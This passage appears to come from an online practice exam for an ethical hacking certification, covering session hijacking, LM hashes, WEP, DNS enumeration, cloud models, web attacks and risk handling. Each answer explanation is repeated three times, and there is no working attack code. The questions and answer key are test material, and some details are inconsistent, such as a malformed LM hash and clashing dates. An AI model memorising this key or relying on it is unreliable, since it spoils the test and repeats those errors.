Use unpredictable sequence numbers is correct.
Session hijacking requires the attacker to guess the proper upcoming sequence number(s) to pull off the attack, pushing the original client out of the session. In the real world, where the predictability of sequence numbers is a function of the operating system, for 99.999% of systems out there configuring sequence numbers is just simply not something you can do. On your exam, though, this is definitely something to remember. For your exam, just remember that using unpredictable session IDs in the first place protects against this. Other countermeasures for session hijacking are fairly common sense: use encryption to protect the channel, limit incoming connections, minimize remote access, and regenerate the session key after authentication is complete.
Incorrect Answers:
Use only nonroutable protocols, Use a file-verification application such as Tripwire, and Use good password policy are incorrect.
These choices would do nothing to stop session hijacking.
Incorrect
Correct Answer:
Use unpredictable sequence numbers is correct.
Session hijacking requires the attacker to guess the proper upcoming sequence number(s) to pull off the attack, pushing the original client out of the session. In the real world, where the predictability of sequence numbers is a function of the operating system, for 99.999% of systems out there configuring sequence numbers is just simply not something you can do. On your exam, though, this is definitely something to remember. For your exam, just remember that using unpredictable session IDs in the first place protects against this. Other countermeasures for session hijacking are fairly common sense: use encryption to protect the channel, limit incoming connections, minimize remote access, and regenerate the session key after authentication is complete.
Incorrect Answers:
Use only nonroutable protocols, Use a file-verification application such as Tripwire, and Use good password policy are incorrect.
These choices would do nothing to stop session hijacking.
Unattempted
Correct Answer:
Use unpredictable sequence numbers is correct.
Session hijacking requires the attacker to guess the proper upcoming sequence number(s) to pull off the attack, pushing the original client out of the session. In the real world, where the predictability of sequence numbers is a function of the operating system, for 99.999% of systems out there configuring sequence numbers is just simply not something you can do. On your exam, though, this is definitely something to remember. For your exam, just remember that using unpredictable session IDs in the first place protects against this. Other countermeasures for session hijacking are fairly common sense: use encryption to protect the channel, limit incoming connections, minimize remote access, and regenerate the session key after authentication is complete.
Incorrect Answers:
Use only nonroutable protocols, Use a file-verification application such as Tripwire, and Use good password policy are incorrect.
These choices would do nothing to stop session hijacking.
Question 25 of 80
25. Question
You are viewing LM hashes and note this one in particular: 3A02FB4397CFC4FFFAAD3B435B51404EE Which of the following passwords would create the LM hash?
Correct
Correct answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect answers:
M@tt1234, 1234M@tt, and 123M@ttt are incorrect. These are all longer than seven characters.
Incorrect
Correct answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect answers:
M@tt1234, 1234M@tt, and 123M@ttt are incorrect. These are all longer than seven characters.
Unattempted
Correct answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect answers:
M@tt1234, 1234M@tt, and 123M@ttt are incorrect. These are all longer than seven characters.
Question 26 of 80
26. Question
Which of the following statements is true regarding WEP cracking?
Correct
Correct Answer:
Initialization Vectors are small, get reused frequently, and are sent in clear text is correct.
An Initialization Vector (IV) provides for confidentiality and integrity. Wireless encryption algorithms use it to calculate an integrity check value (ICV), appending it to the end of the data payload. The IV is then combined with a key to be input into an algorithm (RC4 for WEP, AES for WPA-2). Initialization Vectors in WEP are small, get reused frequently, and are sent in clear text.
Incorrect Answers:
Initialization Vectors are small, get reused frequently, but are encrypted during transmission, Initialization Vectors are large, get reused frequently, and are sent in clear text, and Initialization Vectors are large, get reused frequently, but are encrypted during transmission are incorrect.
The other answers do not match the truth regarding IVs.
Incorrect
Correct Answer:
Initialization Vectors are small, get reused frequently, and are sent in clear text is correct.
An Initialization Vector (IV) provides for confidentiality and integrity. Wireless encryption algorithms use it to calculate an integrity check value (ICV), appending it to the end of the data payload. The IV is then combined with a key to be input into an algorithm (RC4 for WEP, AES for WPA-2). Initialization Vectors in WEP are small, get reused frequently, and are sent in clear text.
Incorrect Answers:
Initialization Vectors are small, get reused frequently, but are encrypted during transmission, Initialization Vectors are large, get reused frequently, and are sent in clear text, and Initialization Vectors are large, get reused frequently, but are encrypted during transmission are incorrect.
The other answers do not match the truth regarding IVs.
Unattempted
Correct Answer:
Initialization Vectors are small, get reused frequently, and are sent in clear text is correct.
An Initialization Vector (IV) provides for confidentiality and integrity. Wireless encryption algorithms use it to calculate an integrity check value (ICV), appending it to the end of the data payload. The IV is then combined with a key to be input into an algorithm (RC4 for WEP, AES for WPA-2). Initialization Vectors in WEP are small, get reused frequently, and are sent in clear text.
Incorrect Answers:
Initialization Vectors are small, get reused frequently, but are encrypted during transmission, Initialization Vectors are large, get reused frequently, and are sent in clear text, and Initialization Vectors are large, get reused frequently, but are encrypted during transmission are incorrect.
The other answers do not match the truth regarding IVs.
Question 27 of 80
27. Question
You are viewing LM hashes and note this one in particular: 3A02FB4397CFC4FFFAAD3B435B51404EE Which of the following would create the LM hash?
Correct
Correct Answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect Answers
All other answers are incorrect. These are all longer than seven characters.
Incorrect
Correct Answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect Answers
All other answers are incorrect. These are all longer than seven characters.
Unattempted
Correct Answer:
M@tt123 is correct. Forget the characters in the password itself and just look at the length. If it’s seven characters or less, the last half of the LM hash will be AAD3B435B51404EE.
Incorrect Answers
All other answers are incorrect. These are all longer than seven characters.
Question 28 of 80
28. Question
Which command displays all running processes on a Linux machine?
Correct
Correct Answer:
ps -ef is correct.
The ps command is used in Linux to display processes. The -e switch selects all processes, and the -f switch provides a full listing.
Incorrect Answers:
ls -l, su, and ls -d are incorrect.
The ls command in Linux lists files inside a storage directory.
The su command in Linux is for “switch user.”
Incorrect
Correct Answer:
ps -ef is correct.
The ps command is used in Linux to display processes. The -e switch selects all processes, and the -f switch provides a full listing.
Incorrect Answers:
ls -l, su, and ls -d are incorrect.
The ls command in Linux lists files inside a storage directory.
The su command in Linux is for “switch user.”
Unattempted
Correct Answer:
ps -ef is correct.
The ps command is used in Linux to display processes. The -e switch selects all processes, and the -f switch provides a full listing.
Incorrect Answers:
ls -l, su, and ls -d are incorrect.
The ls command in Linux lists files inside a storage directory.
The su command in Linux is for “switch user.”
Question 29 of 80
29. Question
You are cataloging asset worth in the environment. A particular hard drive fails once every three years and costs $300 to replace. Fourteen hours is required to restore normal operations on a failure. Recovery technicians earn $10 an hour. Which of the following is the closest approximate cost of the ALE?
Correct
Correct Answer:
$146 is correct.
ALE = SLE × ARO. In this case, ALE = [$300 (replacement) + $140 (14 hours @ 10/hour)] × 33 percent (1 failure every 3 years).
Incorrect Answers:
$400 , $440, and $333 are incorrect.
These answers are not correct calculations, given ALE = SLE × ARO.
Incorrect
Correct Answer:
$146 is correct.
ALE = SLE × ARO. In this case, ALE = [$300 (replacement) + $140 (14 hours @ 10/hour)] × 33 percent (1 failure every 3 years).
Incorrect Answers:
$400 , $440, and $333 are incorrect.
These answers are not correct calculations, given ALE = SLE × ARO.
Unattempted
Correct Answer:
$146 is correct.
ALE = SLE × ARO. In this case, ALE = [$300 (replacement) + $140 (14 hours @ 10/hour)] × 33 percent (1 failure every 3 years).
Incorrect Answers:
$400 , $440, and $333 are incorrect.
These answers are not correct calculations, given ALE = SLE × ARO.
Question 30 of 80
30. Question
The loopback address represents the local host and in IPv4 was represented by 127.0.0.1. What is the loopback address in IPv6?
Correct
Correct Answer:
::1 is correct.
IPv6 uses a 128-bit address instead of the 32-bit IPv4 version. It’s represented as eight groups of four hexadecimal digits separated by colons but can be shortened in display by removing leading zeroes (replaced by a double colon). The loopback address, in full, is 0000:0000:0000:0000:0000:0000:0000:0001, which can be reduced all the way down to ::1.
Incorrect Answers:
fe80::/10, fc00::/7, and fec0::/10 are incorrect.
These values do not represent the loopback address in IPv6. In particular, fe80::/10 is reserved for link local, fc00::/7 is the unique local (like private addressing in IPv4), and fec0::/10 is for site local.
Incorrect
Correct Answer:
::1 is correct.
IPv6 uses a 128-bit address instead of the 32-bit IPv4 version. It’s represented as eight groups of four hexadecimal digits separated by colons but can be shortened in display by removing leading zeroes (replaced by a double colon). The loopback address, in full, is 0000:0000:0000:0000:0000:0000:0000:0001, which can be reduced all the way down to ::1.
Incorrect Answers:
fe80::/10, fc00::/7, and fec0::/10 are incorrect.
These values do not represent the loopback address in IPv6. In particular, fe80::/10 is reserved for link local, fc00::/7 is the unique local (like private addressing in IPv4), and fec0::/10 is for site local.
Unattempted
Correct Answer:
::1 is correct.
IPv6 uses a 128-bit address instead of the 32-bit IPv4 version. It’s represented as eight groups of four hexadecimal digits separated by colons but can be shortened in display by removing leading zeroes (replaced by a double colon). The loopback address, in full, is 0000:0000:0000:0000:0000:0000:0000:0001, which can be reduced all the way down to ::1.
Incorrect Answers:
fe80::/10, fc00::/7, and fec0::/10 are incorrect.
These values do not represent the loopback address in IPv6. In particular, fe80::/10 is reserved for link local, fc00::/7 is the unique local (like private addressing in IPv4), and fec0::/10 is for site local.
Question 31 of 80
31. Question
From the command sequence provided, which of the following best describes the intent? “` C:\> nslookup Default Server: ns1.anybiz.com Address: 200.76.153.12 > set type=HINFO > someserver Server: resolver.anybiz.com Address: 200.76.153.5 Someserver.anybiz.com CPU=Intel Quad Chip OS=Linux 2.8 “`
Correct
Correct Answer:
The operator is enumerating a system named someserver is correct.
The HINFO record type was defined in RFC 1035 and was originally intended to provide the type of computer and operating system a host uses (additionally, you could put in room numbers and other descriptions in the record). In this example, the type is set to HINFO, and a machine name—someserver—is provided.
Incorrect Answers:
The operator is attempting DNS poisoning, The operator is attempting a zone transfer, and The operator is attempting to find a name server are incorrect.
DNS poisoning is not carried out this way. In this command sequence, the operator is asking for information, not pushing up false entries to a name server.
This is also not how nslookup is used to perform a zone transfer (the correct method is the “set type=any” command and then “ls -d anybiz.com”).
Lastly, checking for name servers in the domain would require the “set type=NS” command.
Incorrect
Correct Answer:
The operator is enumerating a system named someserver is correct.
The HINFO record type was defined in RFC 1035 and was originally intended to provide the type of computer and operating system a host uses (additionally, you could put in room numbers and other descriptions in the record). In this example, the type is set to HINFO, and a machine name—someserver—is provided.
Incorrect Answers:
The operator is attempting DNS poisoning, The operator is attempting a zone transfer, and The operator is attempting to find a name server are incorrect.
DNS poisoning is not carried out this way. In this command sequence, the operator is asking for information, not pushing up false entries to a name server.
This is also not how nslookup is used to perform a zone transfer (the correct method is the “set type=any” command and then “ls -d anybiz.com”).
Lastly, checking for name servers in the domain would require the “set type=NS” command.
Unattempted
Correct Answer:
The operator is enumerating a system named someserver is correct.
The HINFO record type was defined in RFC 1035 and was originally intended to provide the type of computer and operating system a host uses (additionally, you could put in room numbers and other descriptions in the record). In this example, the type is set to HINFO, and a machine name—someserver—is provided.
Incorrect Answers:
The operator is attempting DNS poisoning, The operator is attempting a zone transfer, and The operator is attempting to find a name server are incorrect.
DNS poisoning is not carried out this way. In this command sequence, the operator is asking for information, not pushing up false entries to a name server.
This is also not how nslookup is used to perform a zone transfer (the correct method is the “set type=any” command and then “ls -d anybiz.com”).
Lastly, checking for name servers in the domain would require the “set type=NS” command.
Question 32 of 80
32. Question
Your cloud deployment method shares infrastructure with several organizations. Which of the following best describes your deployment method?
Correct
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations. For example, multiple different state-level organizations may get together and take advantage of a community cloud for services they require.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Incorrect
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations. For example, multiple different state-level organizations may get together and take advantage of a community cloud for services they require.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Unattempted
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations. For example, multiple different state-level organizations may get together and take advantage of a community cloud for services they require.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Question 33 of 80
33. Question
Background checks on employees, risk assessments on devices, and policies regarding key management and storage are examples of ___________ measures within physical security.
Correct
Correct Answer:
Operational is correct.
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Incorrect Answers:
physical, technical, and None of the above are incorrect.
Physical controls include all the things you can touch, taste, smell, or get shocked by.
Technical controls are measures taken with technology in mind to protect explicitly at the physical level.
Incorrect
Correct Answer:
Operational is correct.
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Incorrect Answers:
physical, technical, and None of the above are incorrect.
Physical controls include all the things you can touch, taste, smell, or get shocked by.
Technical controls are measures taken with technology in mind to protect explicitly at the physical level.
Unattempted
Correct Answer:
Operational is correct.
Operational measures are the policies and procedures you set up to enforce a security-minded operation.
Incorrect Answers:
physical, technical, and None of the above are incorrect.
Physical controls include all the things you can touch, taste, smell, or get shocked by.
Technical controls are measures taken with technology in mind to protect explicitly at the physical level.
Question 34 of 80
34. Question
A team member advises that sometimes metadata in publicly available documents can provide valuable intelligence on a target. Which of the following tools can perform a metadata search for you?
Correct
Correct Answer:
Metagoofil is correct.
Metagoofil is an information-gathering tool designed for extracting metadata of public documents belonging to a target company. It performs Google searches to identify and download documents to a local disk and then extract the metadata (using different libraries such as Hachoir, PdfMiner, and others). With the results, it will generate a report with usernames, software versions, and servers or machine names that will help penetration testers in the information-gathering phase.
Incorrect Answers:
Nmap, Netcat, and Google Matrix are incorrect.
Nmap is a great scanner, and netcat can do wonders in setting up a backdoor and other tasks, but neither are designed for this task. Google Matrix does not exist.
Incorrect
Correct Answer:
Metagoofil is correct.
Metagoofil is an information-gathering tool designed for extracting metadata of public documents belonging to a target company. It performs Google searches to identify and download documents to a local disk and then extract the metadata (using different libraries such as Hachoir, PdfMiner, and others). With the results, it will generate a report with usernames, software versions, and servers or machine names that will help penetration testers in the information-gathering phase.
Incorrect Answers:
Nmap, Netcat, and Google Matrix are incorrect.
Nmap is a great scanner, and netcat can do wonders in setting up a backdoor and other tasks, but neither are designed for this task. Google Matrix does not exist.
Unattempted
Correct Answer:
Metagoofil is correct.
Metagoofil is an information-gathering tool designed for extracting metadata of public documents belonging to a target company. It performs Google searches to identify and download documents to a local disk and then extract the metadata (using different libraries such as Hachoir, PdfMiner, and others). With the results, it will generate a report with usernames, software versions, and servers or machine names that will help penetration testers in the information-gathering phase.
Incorrect Answers:
Nmap, Netcat, and Google Matrix are incorrect.
Nmap is a great scanner, and netcat can do wonders in setting up a backdoor and other tasks, but neither are designed for this task. Google Matrix does not exist.
Question 35 of 80
35. Question
An attacker takes advantage of a web application’s use of semicolons in communication with databases and enters additional strings to carry out malicious instructions. Which of the following best defines this attack?
Correct
Correct Answer:
CSPP is correct.
A connection string parameter pollution (CSPP) attack takes advantage of web applications that communicate with databases by using semicolons to separate parameters. An attacker can end a parameter prematurely with a semicolon and then add his own code.
Incorrect Answers:
XSS, CSRF, and CSRF are incorrect.
These attacks do not match the description.
Incorrect
Correct Answer:
CSPP is correct.
A connection string parameter pollution (CSPP) attack takes advantage of web applications that communicate with databases by using semicolons to separate parameters. An attacker can end a parameter prematurely with a semicolon and then add his own code.
Incorrect Answers:
XSS, CSRF, and CSRF are incorrect.
These attacks do not match the description.
Unattempted
Correct Answer:
CSPP is correct.
A connection string parameter pollution (CSPP) attack takes advantage of web applications that communicate with databases by using semicolons to separate parameters. An attacker can end a parameter prematurely with a semicolon and then add his own code.
Incorrect Answers:
XSS, CSRF, and CSRF are incorrect.
These attacks do not match the description.
Question 36 of 80
36. Question
An attacker places his sites on a specific group. After several days of monitoring the group members’ traffic, he notes several websites they frequently visit and goes to work infecting those sites with malware. Which of the following best defines this attack?
Correct
Correct answer:
Watering hole attack is correct.
I will admit, prior to preparing for this book, I’d never heard of the watering hole attack. You might ask why one would go through the trouble of infecting multiple websites that have nothing to do with the target when they could otherwise spend that time attacking…well…the target—but c’est la vie. In this attack, the goal is to gain access to a machine owned by one of the target group’s members. By infecting sites the team members visit frequently, sometimes with unknown (zero-day) exploits, the attacker can get members’ machines infected and use that to attack the rest of the group.
Incorrect answers:
Shellshock (a.k.a. Bashdoor) is a Linux vulnerability that allows an attacker to cause vulnerable versions of Bash to execute arbitrary commands.
Heartbleed is an SSL vulnerability that exploits the heartbeat issue in data transfer.
Spray and pray isn’t an attack name that I’m aware of (but it should be, because it sounds really cool).
Incorrect
Correct answer:
Watering hole attack is correct.
I will admit, prior to preparing for this book, I’d never heard of the watering hole attack. You might ask why one would go through the trouble of infecting multiple websites that have nothing to do with the target when they could otherwise spend that time attacking…well…the target—but c’est la vie. In this attack, the goal is to gain access to a machine owned by one of the target group’s members. By infecting sites the team members visit frequently, sometimes with unknown (zero-day) exploits, the attacker can get members’ machines infected and use that to attack the rest of the group.
Incorrect answers:
Shellshock (a.k.a. Bashdoor) is a Linux vulnerability that allows an attacker to cause vulnerable versions of Bash to execute arbitrary commands.
Heartbleed is an SSL vulnerability that exploits the heartbeat issue in data transfer.
Spray and pray isn’t an attack name that I’m aware of (but it should be, because it sounds really cool).
Unattempted
Correct answer:
Watering hole attack is correct.
I will admit, prior to preparing for this book, I’d never heard of the watering hole attack. You might ask why one would go through the trouble of infecting multiple websites that have nothing to do with the target when they could otherwise spend that time attacking…well…the target—but c’est la vie. In this attack, the goal is to gain access to a machine owned by one of the target group’s members. By infecting sites the team members visit frequently, sometimes with unknown (zero-day) exploits, the attacker can get members’ machines infected and use that to attack the rest of the group.
Incorrect answers:
Shellshock (a.k.a. Bashdoor) is a Linux vulnerability that allows an attacker to cause vulnerable versions of Bash to execute arbitrary commands.
Heartbleed is an SSL vulnerability that exploits the heartbeat issue in data transfer.
Spray and pray isn’t an attack name that I’m aware of (but it should be, because it sounds really cool).
Question 37 of 80
37. Question
Which cloud deployment model provides services over a network that is open for public use?
Correct
Correct Answer:
Public is correct.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet). Public cloud is generally used when security and compliance requirements found in large organizations isn’t a major issue.
Incorrect Answers:
Private, Community, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Incorrect
Correct Answer:
Public is correct.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet). Public cloud is generally used when security and compliance requirements found in large organizations isn’t a major issue.
Incorrect Answers:
Private, Community, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Unattempted
Correct Answer:
Public is correct.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet). Public cloud is generally used when security and compliance requirements found in large organizations isn’t a major issue.
Incorrect Answers:
Private, Community, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
The hybrid cloud model is exactly what it sounds like—a composite of two or more cloud deployment models.
Question 38 of 80
38. Question
An attacker gains access to an internal machine. He then uses Metasploit to access and attack other internal systems from that machine. Which of the following terms describes this?
Correct
Correct Answer:
Pivoting is correct.
Pivoting is using a compromised system as a launching point into other systems. After the first system is owned, you can add a route statement in Metasploit to access the network beyond it.
Incorrect Answers:
Fuzzing, Patching, and Switching are incorrect.
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Incorrect
Correct Answer:
Pivoting is correct.
Pivoting is using a compromised system as a launching point into other systems. After the first system is owned, you can add a route statement in Metasploit to access the network beyond it.
Incorrect Answers:
Fuzzing, Patching, and Switching are incorrect.
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Unattempted
Correct Answer:
Pivoting is correct.
Pivoting is using a compromised system as a launching point into other systems. After the first system is owned, you can add a route statement in Metasploit to access the network beyond it.
Incorrect Answers:
Fuzzing, Patching, and Switching are incorrect.
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Question 39 of 80
39. Question
An attacker tells an employee she has left her badge at home and asks for the door to be held open. Which attack is in play here?
Correct
Correct Answer:
Piggybacking is correct.
Piggybacking is different from tailgating in that there is no fake badge in play: the attacker doesn’t have a badge but asks for someone to let her in anyway.
Incorrect Answers:
Tailgating, Propping, and Shoulder surfing are incorrect.
Tailgating makes use of a fake badge.
Shoulder surfing occurs when the attacker is already inside the building.
Propping is not a valid term.
Incorrect
Correct Answer:
Piggybacking is correct.
Piggybacking is different from tailgating in that there is no fake badge in play: the attacker doesn’t have a badge but asks for someone to let her in anyway.
Incorrect Answers:
Tailgating, Propping, and Shoulder surfing are incorrect.
Tailgating makes use of a fake badge.
Shoulder surfing occurs when the attacker is already inside the building.
Propping is not a valid term.
Unattempted
Correct Answer:
Piggybacking is correct.
Piggybacking is different from tailgating in that there is no fake badge in play: the attacker doesn’t have a badge but asks for someone to let her in anyway.
Incorrect Answers:
Tailgating, Propping, and Shoulder surfing are incorrect.
Tailgating makes use of a fake badge.
Shoulder surfing occurs when the attacker is already inside the building.
Propping is not a valid term.
Question 40 of 80
40. Question
Which of the following attacks causes a web browser to send a request that the browser’s user did not intend to send?
Correct
Correct Answer:
CSRF is correct.
Of the answers provided, a cross-site request forgery (CSRF) is the most likely culprit. In a CSRF attack, the user is tricked (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website. The malicious website can then instruct the user’s web browser to send a request to the target website.
Incorrect Answers:
Buffer overflow, XSS, and SQL injection are incorrect.
Buffer overflows allow attackers to inject malicious code into a system’s memory.
XSS executes code within a trusted context on the site itself.
SQL injection uses SQL statements injected into a form or front end to accomplish back-end tasks.
Incorrect
Correct Answer:
CSRF is correct.
Of the answers provided, a cross-site request forgery (CSRF) is the most likely culprit. In a CSRF attack, the user is tricked (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website. The malicious website can then instruct the user’s web browser to send a request to the target website.
Incorrect Answers:
Buffer overflow, XSS, and SQL injection are incorrect.
Buffer overflows allow attackers to inject malicious code into a system’s memory.
XSS executes code within a trusted context on the site itself.
SQL injection uses SQL statements injected into a form or front end to accomplish back-end tasks.
Unattempted
Correct Answer:
CSRF is correct.
Of the answers provided, a cross-site request forgery (CSRF) is the most likely culprit. In a CSRF attack, the user is tricked (usually by phishing) into visiting a malicious website, while the user has an active, authenticated session with a trusted website. The malicious website can then instruct the user’s web browser to send a request to the target website.
Incorrect Answers:
Buffer overflow, XSS, and SQL injection are incorrect.
Buffer overflows allow attackers to inject malicious code into a system’s memory.
XSS executes code within a trusted context on the site itself.
SQL injection uses SQL statements injected into a form or front end to accomplish back-end tasks.
Question 41 of 80
41. Question
A web application in your organization provides significant benefit to the accounting team. However, after a vulnerability scan and a risk assessment, it is determined the application presents significant risk if exposed to external attackers. The server hosting the application is moved inside the DMZ, and strong access controls are put into place allowing only the accounting team to use it. Which of the following best describes the risk method used here?
Correct
Correct Answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are designed to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect Answers:
The organization is accepting the risk, The organization is transferring the risk, and The organization is avoiding the risk are incorrect.
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk involves removing it altogether.
Incorrect
Correct Answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are designed to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect Answers:
The organization is accepting the risk, The organization is transferring the risk, and The organization is avoiding the risk are incorrect.
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk involves removing it altogether.
Unattempted
Correct Answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are designed to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect Answers:
The organization is accepting the risk, The organization is transferring the risk, and The organization is avoiding the risk are incorrect.
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk involves removing it altogether.
Question 42 of 80
42. Question
In which phase of an ethical hack would an attacker identify live targets and discover information about them, such as OS, vulnerabilities present, and IP address?
Correct
Correct Answer:
Scanning is correct.
There are five stages in an ethical hack—reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. In this case, the attacker is using ping as well as port and vulnerability scanners to discover live targets and prepare attacks against them.
Incorrect Answers:
Attack, Reconnaissance, Pre-attack, and Gaining access are incorrect.
Attack and pre-attack are two of the three pen test stages (post-attack being the only one left). Reconnaissance would be using public records and such to gather useful information. Gaining access is where the fun starts—attacking to find a way in.
Incorrect
Correct Answer:
Scanning is correct.
There are five stages in an ethical hack—reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. In this case, the attacker is using ping as well as port and vulnerability scanners to discover live targets and prepare attacks against them.
Incorrect Answers:
Attack, Reconnaissance, Pre-attack, and Gaining access are incorrect.
Attack and pre-attack are two of the three pen test stages (post-attack being the only one left). Reconnaissance would be using public records and such to gather useful information. Gaining access is where the fun starts—attacking to find a way in.
Unattempted
Correct Answer:
Scanning is correct.
There are five stages in an ethical hack—reconnaissance, scanning, gaining access, maintaining access, and clearing tracks. In this case, the attacker is using ping as well as port and vulnerability scanners to discover live targets and prepare attacks against them.
Incorrect Answers:
Attack, Reconnaissance, Pre-attack, and Gaining access are incorrect.
Attack and pre-attack are two of the three pen test stages (post-attack being the only one left). Reconnaissance would be using public records and such to gather useful information. Gaining access is where the fun starts—attacking to find a way in.
Question 43 of 80
43. Question
After the three-way handshake, which flag is set in packets sent in either direction?
Correct
Correct Answer:
ACK is correct.
After the three-way handshake is completed, an ACK flag is set in every packet sent.
Incorrect Answers:
SYN, FIN, and XMAS are incorrect.
The remaining TCP flags do not appear in every packet.
Incorrect
Correct Answer:
ACK is correct.
After the three-way handshake is completed, an ACK flag is set in every packet sent.
Incorrect Answers:
SYN, FIN, and XMAS are incorrect.
The remaining TCP flags do not appear in every packet.
Unattempted
Correct Answer:
ACK is correct.
After the three-way handshake is completed, an ACK flag is set in every packet sent.
Incorrect Answers:
SYN, FIN, and XMAS are incorrect.
The remaining TCP flags do not appear in every packet.
Question 44 of 80
44. Question
Which of the following would be the best defense against sniffing in your organization’s network?
Correct
Correct Answer:
Use encryption throughout the network is correct.
Of the choices provided, encrypting communications between endpoints on your network does the best job of preventing successful sniffing. Someone may find a way to connect and sniff traffic, but if it’s all encrypted they won’t receive much of value.
Incorrect Answers:
Implement MAC filtering on wireless access points, Use static IP addressing, and Ensure strong physical security controls prevent unauthorized access to the server room. are incorrect.
MAC filtering is a good idea on a WAP; however, anyone can spoof a MAC address and sniff anyway. Static IP addressing won’t do a thing to prevent sniffing. Strong security measures throughout your organization will definitely make it harder to pull off a sniffing attack, but on its own this answer protects just the server room—sniffing can be carried out from nearly any available port.
Incorrect
Correct Answer:
Use encryption throughout the network is correct.
Of the choices provided, encrypting communications between endpoints on your network does the best job of preventing successful sniffing. Someone may find a way to connect and sniff traffic, but if it’s all encrypted they won’t receive much of value.
Incorrect Answers:
Implement MAC filtering on wireless access points, Use static IP addressing, and Ensure strong physical security controls prevent unauthorized access to the server room. are incorrect.
MAC filtering is a good idea on a WAP; however, anyone can spoof a MAC address and sniff anyway. Static IP addressing won’t do a thing to prevent sniffing. Strong security measures throughout your organization will definitely make it harder to pull off a sniffing attack, but on its own this answer protects just the server room—sniffing can be carried out from nearly any available port.
Unattempted
Correct Answer:
Use encryption throughout the network is correct.
Of the choices provided, encrypting communications between endpoints on your network does the best job of preventing successful sniffing. Someone may find a way to connect and sniff traffic, but if it’s all encrypted they won’t receive much of value.
Incorrect Answers:
Implement MAC filtering on wireless access points, Use static IP addressing, and Ensure strong physical security controls prevent unauthorized access to the server room. are incorrect.
MAC filtering is a good idea on a WAP; however, anyone can spoof a MAC address and sniff anyway. Static IP addressing won’t do a thing to prevent sniffing. Strong security measures throughout your organization will definitely make it harder to pull off a sniffing attack, but on its own this answer protects just the server room—sniffing can be carried out from nearly any available port.
Question 45 of 80
45. Question
One of the largest consumer credit card and data thefts happened to the retailer T.J.Maxx in 2005. Which of the following technologies was exploited to allow for the data theft?
Correct
Correct Answer:
WEP is correct.
In 2007, WEP was well on its way out. WPA first became available in 2003, and security flaws in WEP were well known and easily exploitable. Per accounts written in the Wall Street Journal and ZDNet, T.J.Maxx’s parent company chose to secure its wireless network using Wired Equivalent Privacy (WEP), and used wireless to transmit data between price-checking devices, cash registers, and computers. Hackers broke the WEP encryption at a Minnesota storefront and collected information submitted by employees logging on to the company’s central database in Massachusetts, stealing usernames and passwords. Hackers then created their own user accounts, and the rest is history (the theft included millions of credit card numbers).
Incorrect Answers:
WPA, WPA2, and Rogue access points are incorrect.
